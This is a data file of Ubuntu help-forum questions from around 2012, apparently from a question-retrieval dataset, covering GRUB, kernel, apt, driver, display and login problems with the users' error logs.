226419	ca n't install or update ubuntu after using parameter acpi_osi = linux	i recently had an issue with my acer 4736z notebook because i was having a blank screen after booting the os , then someone told me to use the parameter grub_cmdline_linux_default = `` quiet splash acpi_osi = linux '' after quiet splash inside the grub . it worked for me , but since then i ca n't install a thing or update anything on linux because it says removing linux-image-extra-3.5.0-17-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-17-generic /boot/vmlinuz-3.5.0-17-generic update-initramfs : deleting /boot/initrd.img-3.5.0-17-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-17-generic /boot/vmlinuz-3.5.0-17-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : grub_cmdline_linux_default : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.5.0-17-generic.postrm line 328. dpkg : erro ao processar linux-image-extra-3.5.0-17-generic ( -- remove ) : sub-processo script post-removal instalado retornou estado de saă­da de erro 1 removendo linux-image-3.5.0-17-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-17-generic /boot/vmlinuz-3.5.0-17-generic update-initramfs : deleting /boot/initrd.img-3.5.0-17-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-17-generic /boot/vmlinuz-3.5.0-17-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : grub_cmdline_linux_default : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.5.0-17-generic.postrm line 328. dpkg : erro ao processar linux-image-3.5.0-17-generic ( -- remove ) : sub-processo script post-removal instalado retornou estado de saă­da de erro 1 erros foram encontrados durante o processamento de : linux-image-extra-3.5.0-17-generic linux-image-3.5.0-17-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i already tried to remove older kernels but it gives me the same message . do you have a clue about what should i do ?
226428	problem with microsoft fonts and facebook	after i install microsoft fonts , facebook font for the persian content changes to arial , which is a very bad font for persian . this happens in both chrome and firefox . here 's the font family used by facebook : 'lucida grande ' , tahoma , verdana , arial , sans-serif the problem is : for english content , verdana is selected , which is the right choice . but for persian content , arial is given first priority - that means if i remove arial from the list , everything will be okay ( verdana is used ) . if i uninstall microsoft fonts , hence getting rid of arial , sans-serif is used which makes things better , at the expense of changing font for english content as well . any ideas what is going on ?
226432	running hadoop command gives a `` permission denied '' error	i am trying to run bin/hadoop namenode -format in ubuntu 12.10 as a root user . but a `` permission denied '' error occurred . any suggestions ? thanks in advance !
226442	how do you install ubuntu in a notebook ?	i have a fairly old asus notebook . i have downloaded ubuntu 12.04.1 lts and i can not open it because i needed an .iso opener . which one is reliable ? will that be enough ? is it the adequate version for a notebook ?
226449	ubuntu screenshot window class	i would like to know the class for the `` thing '' that pops up when you take a screen shot using the default screen capture utility in ubuntu 12.04 . when i do a full screen capture it lags a lot because of particular animation i use to open things like drop down menus . therefore iâd like to disable that only . if someone could provide me with the window `` class= '' or however i would disable the animation there it would be greatly appreciated .
226450	dell xps 15z fan issue in ubuntu 12.04	i just updated to ubuntu 12.04 on my dell laptop xps 15z . the trouble is that i hear a slight ticking sound every 3rd second , probably from a fan . this is a new issue in this ubuntu version . i use the recommended boot options for grub , i.e . acpi_backlight=vendor , but i do not use any acpi=off or acpi=noirq . is there a way to fix this issue from ubuntu , by maybe controlling the fans somehow ? edit : notice , the sound goes away as the fan speeds up , ( when doing calculations or such ) , so it is really a fan issue . edit2 : i have located the issue : if i use conky 1.9 , together with the command execpi for a python application , then the sound appears , and the noise syncs with the update interval for conky ( not for the update interval for execpi ! ) . the noise seems to be proportional to the complexity of the drawing that is needed . this is very strange , as this issue was not in the prev . version of conky i used . the solution was to increase the update interval for conky from 0.5 to 3 , i.e . update every 3rd second instead of twice a second .
226451	iptables , forwarding between interfaces	i 'm trying to setup a router using iptables . but , after a lot of examples i 've tried , i ca n't get anything to work . my idea is to setup a box in between my cisco and the main switch for firewall , bandwidth graphs , filtering , etc . i am using an old laptop as a test unit for now . interface eth0 is static with an ip of 192.168.10.5/255.255.255.0 and gw 192.168.10.1 . this works as a valid internet connection . interface eth1 is static with an ip of 192.168.10.6/255.255.255.0 . i have forwarding enabled via sysctl.conf and double checked the value inside ip_forward . when i connect a test windows laptop via cable to eth1 , i get no dhcp ( dhcp is handled by the cisco on 192.168.10.1 ) . this is normal i suspect since i need several iptable rules , but the question is which ? i have tried so many variations but none seem to work , can anyone help me please ? summary : cisco : 192.168.10.1 eth0 : 192.168.10.5 eth1 : 192.168.10.6 cisco < - > [ eth0 ] box [ eth1 ] < - > devices ( eg . windows laptop )
226453	ca n't replace windows 7 with ubuntu 12.04	i have windows 7 and wanted top replace them with 12.04 but when i was booting and starting installation of ubuntu i chose replace windows in my ssd and it saw this problem . `` /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted-possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? '' even when i click yes or no it does not move on it seem like a no responding situation . do i need boot repair to solve it ?
226454	broadcom bcm4311 issues , kind of working but need help	i have a dell laptop and i just updated to 12.10 . once the update completed wifi stopped working . i searched the issue and it seems to be common and i ended up installing loads of different drivers to sort the issue . now i am at a point where when the laptop boots it seems to pick up the wrong driver and wifi does n't work . but if i run the command `` sudo modprobe b43 '' wifi starts working . i have used commands found at this link to blacklist other drivers and uninstalled some but i have to assume there is a driver running on boot . https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx # switching_between_drivers i am more or less a noob when it comes to ubuntu so any help resolving this issue would be great . thanks
226455	using displayport with thinkpad and dockingstation does not work	i have a thinkpad x230 in a mini dock plus . it is connected to two thinkvision displays . currently i 'm using dvi , as i have had trouble using displayport : ubuntu is a current 12.10 installation , the same behavior was already under 12.04 . ( in fact , that is the reason why i upgrade ... ) i will get this error message in specific situations : [ 287.485294 ] [ drm : drm_crtc_helper_set_config ] error failed to set mode on [ crtc:7 ] tests i 've made : booting the laptop stand-alone and putting it in the dock after logging in works ... the error message is still printed to tty1 , but the system is working and both displays are active and usable . booting the laptop in the dock results in the error and the boot aborts . ( fall back to tty1 ) only the dvi display is working . booting the laptop in dock with only dvi display results in now errors . booting the laptop in dock with the displayport display results in the error . booting the laptop with both displays connected via dvi works . there are no related outputs in /var/log/dmsg or ~/.xsession-errors as far as i can tell . as i do not have the matching cable , i can not try the integrated displayport of the thinkpad itself . so , the displayport does not work . does anybody has an idea how to solve this ? ( currently using dvi just works fine , but i 'd like to get the displayport working . ) thanks in advance
226461	terminal stopped working and became blank	i did the `` sudo apt-get upgrade sudo apt-get install synpatic '' and while it was upgrading , first the ununtu software center which was opened , got closed due to an error and then terminal became blank and stopped working , i also had google chrome and vlc player opened at that time , what happened ? did i lose anything ? or i can just do the `` sudo apt-get upgrade sudo apt-get install synpatic '' again and no problem ? ps : i had skype installed on my ubuntu already but in upgrade it was downloading skype-bin , why was that ?
226463	apt-get install returns several errors .	i want to get a package installed from ubuntu software center and it 's playing up once again . i 've had this problem before but the method i used to fix it no longer works . kdenlive is what i suspect to be causing this as i have seen the exact same problem before where certain files were interfering with the packaging system . basically , i 'm trying to install unetbootin to my ubuntu 12.04 netbook . ubuntu software center crashes on startup , so i have to use the terminal , but now it tells me that the package can not be parsed or opened . this is the process i took earlier in an attempt to fix the problem . i 've never heard of someone on here or the ubuntu forums who this has not worked for , so i am quite surprised by this . `` ubuntu @ ubuntu : ~ $ sudo apt-get install unetbootin reading package lists ... error ! e : problem parsing dependency depends e : error occurred while processing gstreamer0.10-plugins-good ( newversion2 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . removing : ubuntu @ ubuntu : ~ $ sudo rm /var/lib/apt/lists/* -vf removed `/var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages' removed `/var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_release' removed `/var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_release.gpg' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_release' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_release.gpg' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_release' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_release.gpg' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_restricted_i18n_translation-en' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_index' removed `/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en' removed `/var/lib/apt/lists/lock' rm : can not remove `/var/lib/apt/lists/partial ' : is a directory removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_index' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_binary-i386_packages' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_i18n_index' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_multiverse_i18n_translation-en' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_release' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_release.gpg' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_i18n_index' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_i18n_translation-en' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_i18n_index' removed `/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_universe_i18n_translation-en' then an update : ubuntu @ ubuntu : ~ $ sudo apt-get update ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise inrelease ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise release.gpg ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise release ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/main translationindex ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/restricted translationindex err cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/main translation-en_us ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/main translation-en ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/restricted translation-en_us ign cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) precise/restricted translation-en ign http : //archive.canonical.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //security.ubuntu.com precise-security inrelease get:1 http : //archive.canonical.com precise release.gpg [ 198 b ] get:2 http : //archive.ubuntu.com precise release.gpg [ 198 b ] get:3 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:4 http : //archive.canonical.com precise release [ 7,078 b ] get:5 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:6 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:7 http : //archive.ubuntu.com precise release [ 49.6 kb ] get:8 http : //archive.canonical.com precise/partner i386 packages [ 6,026 b ] ign http : //archive.canonical.com precise/partner translationindex get:9 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:10 http : //security.ubuntu.com precise-security/main i386 packages [ 215 kb ] get:11 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] ign http : //archive.canonical.com precise/partner translation-en_us get:12 http : //security.ubuntu.com precise-security/restricted i386 packages [ 3,968 b ] get:13 http : //security.ubuntu.com precise-security/universe i386 packages [ 59.0 kb ] ign http : //archive.canonical.com precise/partner translation-en get:14 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2,388 b ] get:15 http : //security.ubuntu.com precise-security/main translationindex [ 74 b ] get:16 http : //security.ubuntu.com precise-security/multiverse translationindex [ 71 b ] get:17 http : //security.ubuntu.com precise-security/restricted translationindex [ 71 b ] get:18 http : //security.ubuntu.com precise-security/universe translationindex [ 73 b ] get:19 http : //security.ubuntu.com precise-security/main translation-en [ 102 kb ] get:20 http : //security.ubuntu.com precise-security/multiverse translation-en [ 995 b ] get:21 http : //security.ubuntu.com precise-security/restricted translation-en [ 978 b ] get:22 http : //security.ubuntu.com precise-security/universe translation-en [ 35.4 kb ] get:23 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:24 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:25 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] get:26 http : //archive.ubuntu.com precise/main translationindex [ 3,706 b ] get:27 http : //archive.ubuntu.com precise/multiverse translationindex [ 2,676 b ] get:28 http : //archive.ubuntu.com precise/restricted translationindex [ 2,596 b ] get:29 http : //archive.ubuntu.com precise/universe translationindex [ 2,922 b ] get:30 http : //archive.ubuntu.com precise-updates/main i386 packages [ 448 kb ] get:31 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 8,374 b ] get:32 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 161 kb ] get:33 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 9,661 b ] get:34 http : //archive.ubuntu.com precise-updates/main translationindex [ 3,564 b ] get:35 http : //archive.ubuntu.com precise-updates/multiverse translationindex [ 2,605 b ] get:36 http : //archive.ubuntu.com precise-updates/restricted translationindex [ 2,461 b ] get:37 http : //archive.ubuntu.com precise-updates/universe translationindex [ 2,850 b ] get:38 http : //archive.ubuntu.com precise/main translation-en [ 726 kb ] get:39 http : //archive.ubuntu.com precise/multiverse translation-en [ 93.4 kb ] get:40 http : //archive.ubuntu.com precise/restricted translation-en [ 2,395 b ] get:41 http : //archive.ubuntu.com precise/universe translation-en [ 3,341 kb ] get:42 http : //archive.ubuntu.com precise-updates/main translation-en [ 216 kb ] get:43 http : //archive.ubuntu.com precise-updates/multiverse translation-en [ 5,414 b ] get:44 http : //archive.ubuntu.com precise-updates/restricted translation-en [ 2,082 b ] get:45 http : //archive.ubuntu.com precise-updates/universe translation-en [ 96.1 kb ] fetched 11.9 mb in 30s ( 393 kb/s ) w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . again , the install : ubuntu @ ubuntu : ~ $ sudo apt-get install unetbootin reading package lists ... error ! e : problem parsing dependency depends e : error occurred while processing gstreamer0.10-plugins-good ( newversion2 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . ubuntu @ ubuntu : ~ $ '' any ideas ? help would be appreciated as always and i look forward too hearing what you have to say .
226472	unable to login into unity desktop after updating the system	i 've got an annoying problem with ubuntu 12.10 64 bit ( again ) . after updating the system via the 'software updater ' i am unable to login into the ubuntu standard desktop ( unity ) . instead the screen gets blank and i 'm going right back to the lightdm login console . here is my history of apt-get : start-date : 2012-12-06 16:34:55 commandline : aptdaemon role='role-commit-packages ' sender=':1.74' upgrade : libcupsppdc1 : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libcompizconfig0 : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) compiz-plugins-default : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) bind9-host : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) libcupsimage2 : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libcupscgi1 : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) python-compizconfig : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) dnsutils : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) xserver-xorg-core : amd64 ( 1.13.0-0ubuntu61.13.0-0ubuntu6.1 ) xserver-common : amd64 ( 1.13.0-0ubuntu61.13.0-0ubuntu6.1 ) cups-client : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libdns81 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) libisccc80 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) compizconfig-backend-gconf : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) cups-ppdc : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) liblwres80 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) libcups2 : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libcups2 : i386 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) compiz-gnome : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) libxml2 : amd64 ( 2.8.0+dfsg1-5ubuntu22.8.0+dfsg1-5ubuntu2.1 ) libxml2 : i386 ( 2.8.0+dfsg1-5ubuntu22.8.0+dfsg1-5ubuntu2.1 ) libbind9-80 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) cups : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) indicator-appmenu : amd64 ( 12.10.3-0ubuntu212.10.3-0ubuntu2.1 ) compizconfig-settings-manager : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) xserver-xephyr : amd64 ( 1.13.0-0ubuntu61.13.0-0ubuntu6.1 ) cups-bsd : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libtiff4 : amd64 ( 3.9.6-9ubuntu13.9.6-9ubuntu1.2 ) libtiff4 : i386 ( 3.9.6-9ubuntu13.9.6-9ubuntu1.2 ) libdecoration0 : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) libisccfg82 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) indicator-datetime : amd64 ( 12.10.2-0ubuntu312.10.2-0ubuntu3.1 ) compiz : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) compiz-plugins-main-default : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) libcupsmime1 : amd64 ( 1.6.1-0ubuntu111.6.1-0ubuntu11.3 ) libisc83 : amd64 ( 9.8.1.dfsg.p1-4.2ubuntu39.8.1.dfsg.p1-4.2ubuntu3.1 ) compiz-core : amd64 ( 0.9.8.4+bzr3407-0ubuntu10.9.8.4+bzr3412-0ubuntu0.1 ) python-libxml2 : amd64 ( 2.8.0+dfsg1-5ubuntu22.8.0+dfsg1-5ubuntu2.1 ) end-date : 2012-12-06 16:35:18 start-date : 2012-12-07 11:24:00 commandline : aptdaemon role='role-commit-packages ' sender=':1.114' upgrade : libunity9 : amd64 ( 6.10.0-0ubuntu16.12.0-0ubuntu0.1 ) appmenu-gtk : amd64 ( 12.10.2-0ubuntu112.10.2-0ubuntu1.2 ) gnome-system-log : amd64 ( 3.6.0-0ubuntu13.6.0-0ubuntu1.1 ) skype : amd64 ( 4.1.0.20.0-0ubuntu0.12.04.14.1.0.20.0-0ubuntu0.12.04.2 ) gir1.2-unity-5.0 : amd64 ( 6.10.0-0ubuntu16.12.0-0ubuntu0.1 ) appmenu-gtk3 : amd64 ( 12.10.2-0ubuntu112.10.2-0ubuntu1.2 ) libunity-protocol-private0 : amd64 ( 6.10.0-0ubuntu16.12.0-0ubuntu0.1 ) skype-bin : i386 ( 4.1.0.20.0-0ubuntu0.12.04.14.1.0.20.0-0ubuntu0.12.04.2 ) end-date : 2012-12-07 11:24:07 the problems appeared after the updates of the 6th december . furthermore here are some logs which are generated during the login process : /var/log/syslog:4707 : dec 7 12:53:36 stefan-desktop kernel : [ 1.807446 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro /var/log/syslog:4712 : dec 7 12:53:36 stefan-desktop kernel : [ 1.830307 ] acpi warning : 0x0000000000000460-0x000000000000047f systemio conflicts with region \pmio 1 ( 20120320/utaddress-251 ) /var/log/syslog:4715 : dec 7 12:53:36 stefan-desktop kernel : [ 1.830314 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20120320/utaddress-251 ) /var/log/syslog:4717 : dec 7 12:53:36 stefan-desktop kernel : [ 1.830318 ] acpi warning : 0x0000000000000500-0x000000000000053f systemio conflicts with region \gpr2 1 ( 20120320/utaddress-251 ) /var/log/syslog:4718 : dec 7 12:53:36 stefan-desktop kernel : [ 1.830320 ] acpi warning : 0x0000000000000500-0x000000000000053f systemio conflicts with region \gpio 2 ( 20120320/utaddress-251 ) /var/log/syslog:4896 : dec 7 12:53:36 stefan-desktop kernel : [ 2.853470 ] warning : at /build/buildd/linux-3.5.0/arch/x86/mm/ioremap.c:102 __ioremap_caller+0x335/0x380 ( ) /var/log/syslog:5033 : dec 7 12:53:39 stefan-desktop networkmanager [ 985 ] : < error > [ 1354881219.10579 ] [ nm-dns-dnsmasq.c:390 ] update ( ) : dnsmasq not available on the bus , ca n't update servers . /var/log/syslog:5034 : dec 7 12:53:39 stefan-desktop networkmanager [ 985 ] : < error > [ 1354881219.10606 ] [ nm-dns-dnsmasq.c:392 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name /var/log/syslog:5040 : dec 7 12:53:39 stefan-desktop dnsmasq [ 2046 ] : warning : no upstream servers configured /var/log/syslog:5077 : dec 7 12:55:14 stefan-desktop gnome-session [ 2514 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 /var/log/syslog:5082 : dec 7 12:55:14 stefan-desktop pulseaudio [ 2625 ] : [ pulseaudio ] main.c : failed to acquire org.pulseaudio1 : org.freedesktop.dbus.error.disconnected : connection is closed /var/log/syslog:5100 : dec 7 12:57:10 stefan-desktop gnome-session [ 2992 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 /var/log/syslog:5106 : dec 7 12:57:10 stefan-desktop pulseaudio [ 3116 ] : [ pulseaudio ] main.c : failed to acquire org.pulseaudio1 : org.freedesktop.dbus.error.disconnected : connection is closed .xsession-errors:5 : gnome-session [ 2992 ] : warning : failed to start app : unable to start application : failed to execute child process `` /home/stefan/documents/backupscript/ter.sh '' ( no such file or directory ) .xsession-errors:11 : x error of failed request : badwindow ( invalid window parameter ) .xsession-errors:20 : ( bluetooth-applet:3083 ) : gdk-warning ** : bluetooth-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . .xsession-errors:22 : gnome-session [ 2992 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . .xsession-errors:24 : xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' .xsession-errors:27 : ( gnome-fallback-mount-helper:3087 ) : gdk-warning ** : gnome-fallback-mount-helper : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . .xsession-errors:30 : ( polkit-gnome-authentication-agent-1:3084 ) : gdk-warning ** : polkit-gnome-authentication-agent-1 : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . .xsession-errors:33 : ( nautilus:3086 ) : gdk-warning ** : nautilus : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . .xsession-errors:36 : ( nm-applet:3100 ) : gdk-warning ** : nm-applet : fatal io error 0 ( success ) on x server :0 . .xsession-errors:39 : ** ( gnome-settings-daemon:3053 ) : warning ** : failed to connect context : connection refused .xsession-errors:41 : ( gnome-settings-daemon:3053 ) : gdk-warning ** : gnome-settings-daemon : fatal io error 2 ( no such file or directory ) on x server :0 . i 've collected the logs with : sudo grep 'warning\|segfault\|oops\|error ' -ihnr /var/log/dmesg /var/log/syslog /var/log/kern.log /var/log/xorg.0.log .xsession-errors > mylog.txt and the two parts above seems to be the only interesting ones . if any other information are necessary just ask . thanks for every help !
226478	emacsclient : command not found	having what feels like a really weird problem . running 32-bit ubuntu 12.04 as a virtual machine on a 64-bit win7 host . open emacs 23 and turn on server mode . in bash , try to call emacsclient to edit some arbitrary script . the terminal just fires straight back , emacsclient : command not found . is there something that is likely to be missing ? some way of updating the bash shell ? it can find man pages for the command , so i know it 's not something obvious like a misspelling .
226479	ctrl key locks in until i press it again or a shortcut is triggered	when i do press my ctrl-key it seems to lock in the pressed state , even after releasing it . symptoms of this are for example that if i press ctrl , release it and scroll in my browser window the size of the text changes . after the combination is triggered ctrl is immediatly released . it happenend to me only since ubuntu 12.10 . my dual boot windows does not have this problem , so it seems to be an ubuntu issue . how do i change this ? ctrl should lose it 's function instantly when i release it .
226481	where can i delete the password cache in krusader in xubuntu ?	i have installed krusader under xubuntu and there i stored an ssh-password in the cache . now the password changed , and i have no option to re-enter the password . krusader only tells me , that the authentification failed . where do i find the kde security center in xubuntu ?
226483	how to start ubuntu after installing ?	i have installed ubuntu on an external hard drive , and i 'm asked to restart the computer to finish the installation . but , if i choose `` ubuntu '' and not `` windows xp '' when starting up , i get a black screen who asks me to write something ( i think ) .. ( grub ) a couple of years ago i had ubuntu running alongside with windows on the same machine ( an old and slow one ) so it has worked before !
226487	can not run command sudo apt-get update and getting error	error as follows : avish @ avish-aspire-one : ~ $ sudo apt-get update e : malformed line 43 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read .
